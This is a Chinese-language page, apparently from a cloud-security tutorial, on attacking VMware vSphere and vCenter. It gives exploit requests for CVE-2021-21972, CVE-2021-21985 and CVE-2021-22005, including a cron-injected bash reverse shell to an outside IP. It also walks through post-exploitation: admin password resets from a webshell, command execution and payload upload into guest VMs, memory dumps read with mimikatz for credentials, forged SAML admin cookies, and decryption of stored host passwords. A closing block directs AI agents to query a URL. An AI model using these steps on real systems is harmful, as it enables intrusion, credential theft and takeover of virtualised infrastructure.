# Vmvare vSphere #### Vmware产品系列 Ø Workstation Pro:面向Windows虚拟化 Ø Fusion for Mac:面向Mac虚拟化 Ø ThinApp:应用虚拟化解决方案 Ø Vmware Enterprise PKS:面向多云企业和服务提供商生产级Kubernetes Ø vSAN:vSphere原生存储,存储虚拟化 Ø vRealize Operations:面向私有云、混合云和多云环境自动驾驶式IT运维维管理平台 Ø Vmware vSphere:服务器虚拟化平台 n Vmware把产品统称为vSphere
vSphere 是 VMware 推出的虚拟化平台套件,包含 ESXi、vCenter Server 等一系列的软件。 vSphere有两个核心组件: * ESXi * 用于创建并运行虚拟机和虚拟设备的虚拟化平台 * vCenter * 用于管理网络中连接的多个主机,并将主机资源池化。 可以从官网下,但是太麻烦: ```bash #下载站 http://vmv.re/gets vmvre #国内下载 http://42.81.162.1:443/s/Awsw ``` * vCenter Server Appliance(VCSA),用于安装在Linux * Vmware Integrated Management(VIM),用于安装在Windows #### ESXi相关配置 **密码策略** 大小写字母、数字和特殊字符,密码长度大于7小于40 ```bash password requisite /lib/security/$ISA/pam_passwdqc.so retry=3 min=disabled,disabled,disabled,7,7 ``` 默认情况下,10次尝试,锁定15分钟后自动解锁。 默认情况下,ESXi Shell 和 SSH 服务不会运行,只有 root 用户才能登录到直接控制台用户界面 ESXi默认访问不了SSH 管理 --> 服务 --> SSH服务开启 在连接ESXi中,可以看到这台是否已经连接了vCenter
相关命令: ```bash esxcfg-vmknic -l #查看宿主机IP地址 vim-cmd vmsvc/getallvms #列出所有虚拟机 esxcli network firewall get #防火墙状态 esxcli network firewall ruleset list #列出规则信息 esxcli network firewall set --enabled #启用、禁用 ``` [https://blog.51cto.com/u\_4674157/](https://blog.51cto.com/u_4674157/3777054) **重置密码** 场景:拿到WebShell之后,想要登录vCenter,而且密码解不出来,可以强制重置密码。 ```bash #Linux 强制重置SSO administrator密码 /usr/lib/vmware-vmdir/bin/vdcadmintool #Windows 强制重置密码 C:\Program Files\Vmware\vCenter Server\vmdird\vdcadmintool.exe ``` **使用HTTPS PUT SSH密钥** 默认情况下,ESXiShell 和 SSH 服务不会启动,只有 root 用户才能登录到直接控制台用户界面,开启SSH后只允许密钥访问,使用 HTTPS PUT 上传 SSH 密钥。 密钥类型位置: root 用户的授权密钥文件 ```bash https://hostname_or_IP_address/host/ssh_root_authorized_keys ``` 您必须对主机具有完全管理员特权才可上载此文件。 ```bash DSA 密钥 https://hostname_or_IP_address/host/ssh_host_dsa_key DSA 公用密钥 https://hostname_or_IP_address/host/ssh_host_dsa_key_pub RSA 密钥 https://hostname_or_IP_address/host/ssh_host_rsa_key RSA 公用密钥 https://hostname_or_IP_address/host/ssh_host_rsa_key_pub ``` esxi 401 认证,是服务器密码,不是前台密码。 {% code overflow="wrap" %} ```bash https://192.168.238.137/host/ #生成密钥 ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa PUT /host/ssh_root_authorized_keys HTTP/1.1 Host: 192.168.238.138 Authorization: Basic cm9vdDoxMjNxd2UhQCMuLi4= Content-Length: 407 ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABAQCZ4gGhuM9GFeh7Kivi0BmxjLy4Brq9V3AEzPlXoXnHWumFC/FJWmZrHVGgDzBL26o/qsPyHnMffJve6egqyaV05+ULiPOzpjoLmG3+7uhhEKfY7KZ/uDMkmeufhvwTBfIIndARqzuAbsx6ekJb794fBhpOG7hPNcziqs5jRRQf9lLUQgltBfReFf6Tj9j2Ff471HlGaVdwKyGp4T3oKpH4K7kgdarMoh1KT2bC9ijHD1TpdQLfNjKJ+uXccaWWG7eEQCYmwQtbL80PVVTq5HTkZaqw+BhSRF8ur0NWX9WC3G4r4vYEc46meh1pwowHn69ZWRuvql1I4IfjytL4totH root@localhost.localdomain ``` {% endcode %} #### 漏洞利用 Ø 查看Vcenter版本信息:/sdk/vimServiceVersions.xml **CVE-2021-21972** 影响范围 Ø VMware vCenter Server 7.0系列 < 7.0.U1c Ø VMware vCenter Server 6.7系列 < 6.7.U3l Ø VMware vCenter Server 6.5系列 < 6.5 U3n Ø VMware ESXi 7.0系列 < ESXi70U1c-17325551 Ø VMware ESXi 6.7系列 < ESXi670-202102401-SG Ø VMware ESXi 6.5系列 < ESXi650-202102101-SG **Windowst利用** Windows vCenter程序路径: {% code overflow="wrap" %} ```bash ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport #构造tar包 https://github.com/ptoomey3/evilarc/blob/master/evilarc.py python evilarc.py -d 2 -p 'ProgramData\VMware\vCenterServer\data\perfcharts\tc-instance\webapps\statsreport' -o win -f winexpl.tar winshe.jsp ``` {% endcode %} ```bash POST /ui/vropspluginui/rest/services/uploadova HTTP/1.1 Host: 192.168.238.132 Cookie: VSPHERE-USERNAME=Administrator%40VSPHERE.LOCAL; VSPHERE-CLIENT-SESSION-INDEX=_f97bb91caea8a2af952cd91ec5d47eb8; VSPHERE-UI-JSESSIONID=0C5DAAED678BDADE5DE0A9599359A141; VSPHERE-UI-XSRF-TOKEN=059001d4-15b3-4ab5-b83f-604c37fb2471; style=light Accept-Encoding: gzip, deflate Content-Type: multipart/form-data; boundary=----WebKitFormBoundary1YoXljo9 Content-Length: 10389 ------WebKitFormBoundary1YoXljo9 Content-Disposition: form-data; name="uploadFile"; filename="winexpl.tar" Paste from file winexpl.tar ------WebKitFormBoundary1YoXljo9-- ``` **Linux利用** 【如果不成功,尝试本地创建vsphere-ui之后再生成密钥】 {% code overflow="wrap" %} ```bash python evilarc.py -d 2 -p 'home/vsphere-ui/.ssh' -o unix -f unixshe.tar authorized_keys ssh vsphere-ui@Your IP #需要重启 /usr/lib/vmware-vsphere-ui/server/work/deployer/s/global/ Linux Shell的路径:https://photom-matchine/ui/resources/winshe.jsp 如果不行使用(脚本有问题,要重新写): https://github.com/NS-Sp4ce/CVE-2021-21972/blob/7048b1d0a71a862284c2d54f78aba913ccef5776/CVE-2021-21972.py https://0x20h.com/p/7cb6 ``` {% endcode %} **CVE-2021-21985** Ø vCenter Server 6.5 Ø vCenter Server 6.7 Ø vCenter Server 7.0 Ø Cloud Foundation (vCenter Server) 3.x Ø Cloud Foundation (vCenter Server) 4.x 只有Linux ```bash java -jar JNDIInjection-Bypass.jar 1099 192.168.238.1 8841 nc -lvp 8841 python3 CVE-2021-21985_exp.py https://192.168.238.149 rmi://192.168.238.146:1099/Exploit ``` **CVE-2021-22005** 影响版本: 7.0,6.7,6.5,4.x,3.x (EXP) ```bash POST /analytics/telemetry/ph/api/hyper/send?_c=e&_i=/ce21 HTTP/1.1 Host: 192.168.23.119 Content-Length: 60 {"aaa":"bbb"} ``` {% code overflow="wrap" %} ```bash POST /analytics/telemetry/ph/api/hyper/send?_c=e&_i=/../../../../../../../../../../../../etc/cron.d/cs21 HTTP/1.1 Host: 192.168.23.119 Content-Length: 60 */1 * * * * root bash -i >& /dev/tcp/192.168.23.77/8091 0>&1 ``` {% endcode %} **vCenter < 6.0 S2-045** ```bash #老版本Struts S2-045 https://vmware/statsreport/vmHome.do ``` #### 后渗透利用 以下一切操作的前提都需要权限 拿到密码后可利用: Ø 读取虚拟机的配置 Ø 查看虚拟机文件 Ø 删除虚拟机文件 Ø 向虚拟机上传文件 Ø 从虚拟机下载文件 Ø 在虚拟机中执行命令 在旧的REST API(低于vSphere7.0U2)不支持以下操作: Ø 查看虚拟机文件 Ø 删除虚拟机文件 Ø 向虚拟机上传文件 Ø 从虚拟机下载文件 Ø 在虚拟机中执行命令 **SharpSphere** {% code overflow="wrap" %} ```bash #无法编译时: 工具 --> NuGet包管理器 --> 程序包源 --> 加更新源:https://api.nuget.org/v3/index.json #获取信息 SharpSphere.exe list --url https://192.168.238.138/sdk/ --username root --password 123qwe!@# [x] Disabling SSL checks in case vCenter is using untrusted/self-signed certificates [x] Creating vSphere API interface [x] Connected to VMware ESXi 6.7.0 build-15160138 [x] Authenticating with provided username and password [x] Successfully authenticated Name: Centos7 | Power: poweredOn | OS: CentOS 7 (64-bit) | Tools: guestToolsUnmanaged | IP: 192.168.238.139 #Execute .\SharpSphere.exe execute --url https://192.168.238.138/sdk --username root --password 123qwe!@# --ip 192.168.238.141 --guestusername administrator --guestpassword 123qwe!@# --command whoami --output #Upload FIle .\SharpSphere.exe upload --url https://192.168.238.138/sdk --username root --password 123qwe!@# --ip 192.168.238.141 --guestusername administrator --guestpassword 123qwe!@# --source D:\calc.exe --destination C:\Users\Public\payload.exe #DOwnload FIle Z:\>SharpSphere.exe download --url https://URL/sdk --username administrator@vsphere.local --password --ip --guestusername James --guestpassword --source C:\Users\Public\payload.exe --destination Z:\result.exe ``` {% endcode %} **Dump内存获取密码** {% code overflow="wrap" %} ```bash #Dump,目前ESXi有问题,无法下载文件,但在vCenter可以成功 .\SharpSphere.exe dump --url https://192.168.238.138/sdk/ --username root --password 123qwe!@# --targetvm "Win2008" --destination "C:\Users\Public\" --snapshot #下载快照后缀为vmsn、vmem .\vmss2core-sb-8456865.exe -W .\Win2008-Snapshot5.vmsn .\Win2008-Snapshot5.vmem #Microsoft Windows 8/8.1, Windows Server 2012, Windows Server 2016 or Windows Server 2019 run this command: vmss2core.exe -W8 virtual_machine_name.vmsn virtual_machine_name.vmem #使用Windbg PreView加载内存 https://docs.microsoft.com/en-us/windows-hardware/drivers/debugger/windbg-install-preview #内部加载mimilib kd> .load C:\Users\A\Desktop\vmnx\mimikatz_trunk\x64\mimilib.dll #查看lsass进程 kd> !process 0 0 lsass.exe 切换到该进程中 kd> .process /r /p fffffa80028f2400 #抓取内存密码 kd> !mimikatz ``` {% endcode %} ![](/files/z64RTKR1Zfoow2RO2gDa) **扩展:qcow2后缀** ```bash #只读方式打开虚拟磁盘 guestfish --ro -a /var/lib/libvirt/images/centos7.qcow2 > run #扫描 > list-filesystems #列出文件系统 > mount /dev/centos/root / #挂载目录 > cat /etc/shadow #实现自动探查后自动挂载 guestfish --ro -a /var/lib/libvirt/images/centos7.qcow2 -i ``` **PySharpSphere** 此工具是通过pyVmomi来实现 {% code overflow="wrap" %} ```bash #list pysharpsphere.exe -H 192.168.238.132 -u administrator@vsphere.local -p #jLuNK5[z(,0p6K9Xj7C list #执行命令 pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password execute -t vm-1020 --guest-user administrator --guest-pass guestpassword -c whoami #上传文件 pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password upload -t vm-1020 --guest-user administrator --guest-pass guestpassword --source /tmp/test.exe --dest C:\\c2.exe #获取镜像快照 pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password dump -t vm-1020 #通过NTLM执行命令 pysharpsphere.exe -H 192.168.100.49 -u administrator@vsphere.local -p password execute -t vm-1015 --guest-user administrator --guest-ntlm ea41383fa39c20f186cbcdc0ac234417 -c whoami ``` {% endcode %} 实际上只要登录到vCenter界面都可以操作: 创建快照 --> 数据存储 --> 下载快照 ![](/files/IymW7TeIouIOnkgQU5mT) **PowerCLI** 官方文档 : {% code overflow="wrap" %} ```bash #离线安装 下载PowerCLI的Zip文件,地址如下: https://code.vmware.com/doc/preview?id=13693 #获取路径,将PowerCLI的Zip文件解压至该目录 $env:PSModulePath #判断是否有安装成功 Get-Module -Name VMware.PowerCLI -ListAvailable #远程执行策略允许 Set-ExecutionPolicy RemoteSigned #忽略证书验证 Set-PowerCLIConfiguration -Scope AllUsers -ParticipateInCeip $false -InvalidCertificateAction Ignore #连接服务器 Connect-VIServer -Server 192.168.238.149 -Protocol https -User Administrator@GIAO.LOCAL -Password Qazxx!@#... -Force #断开连接 Disconnect-VIServer -Server 192.168.238.149 -Force -Confirm:$false #上传文件 Copy-VMGuestFile -Source c:\text.txt -Destination c:\temp\ -VM VM -LocalToGuest -GuestUser user -GuestPassword pass2 #下载文件 Copy-VMGuestFile -Source c:\text.txt -Destination c:\temp\ -VM VM -GuestToLocal -GuestUser user -GuestPassword pass2 #先通过Get-VM 获取主机名称,之后指定执行命令: Invoke-VMScript -VM "Centos7 (1)" -ScriptText "cat /etc/passwd" -GuestUser root -GuestPassword "123qwe!@#" ``` {% endcode %} ![](/files/HlmzNc8di1hhBZadkFu6) Windows执行虚拟机命令的前提条件是装了Vmware Tools才能执行命令。 {% code overflow="wrap" %} ```bash Invoke-VMScript -VM "Win2012" -ScriptText "whoami" -GuestUser administrator -GuestPassword "123qwe!@#" ``` {% endcode %}
走的流量是加密
**vCenter SAML Certificates** 拿到WebShell后,不想重置管理员密码的情况下。 读取data.mdb证书信息,通过证书请求获取管理员cookie ```bash Linux: /storage/db/vmware-vmdir/data.mdb Windows: C:\ProgramData\VMware\vCenterServer\data\vmdird\data.mdb python3 vcenter_saml_login.py -p data.mdb -t 10.0.100.200 [*] Successfully extracted the IdP certificate [*] Successfully extracted trusted certificate 1 [*] Successfully extracted trusted certificate 2 [*] Obtaining hostname from vCenter SSL certificate [*] Found hostname vcsa.olympus for 10.0.100.200 [*] Initiating SAML request with 10.0.100.200 [*] Generating SAML assertion [*] Signing the SAML assertion [*] Attempting to log into vCenter with the signed SAML request [+] Successfuly obtained Administrator cookie for 10.0.100.200! [+] Cookie: VSPHERE-UI-JSESSIONID=06D1630719B4DE33A4CE653458911640 ``` 访问https\://\/ui的VCSA实例,在/ui路径下添加cookie **解密vpxuser** {% code overflow="wrap" %} ```bash #获取vc用户的密码 cat /etc/vmware-vpx/vcdb.properties #把加密后的密码单独拿出来, psql -h 127.0.0.1 -p 5432 -U vc -d VCDB -c "select ip_address,user_name,password from vpx_host;" > password.enc #拿解密key cat /etc/vmware-vpx/ssl/symkey.dat Windows:C:\ProgramData\VMware\vCenterServer\cfg\vmware-vpx\ssl\symkey.dat Linux:/etc/vmware-vpx/ssl/symkey.dat #破解 python decrypt.py symkey.dat password.enc pass.txt ``` {% endcode %} --- # Agent Instructions: Querying This Documentation If you need additional information that is not directly available in this page, you can query the documentation dynamically by asking a question. Perform an HTTP GET request on the current page URL with the `ask` query parameter: ``` GET https://lzcloudsecurity.gitbook.io/yun-an-quan-gong-fang-ru-men/di-wu-zhang-si-you-yun-yu-xu-ni-hua-gong-fang/vmvare-vsphere.md?ask= ``` The question should be specific, self-contained, and written in natural language. The response will contain a direct answer to the question and relevant excerpts and sources from the documentation. Use this mechanism when the answer is not explicitly present in the current page, you need clarification or additional context, or you want to retrieve related documentation sections.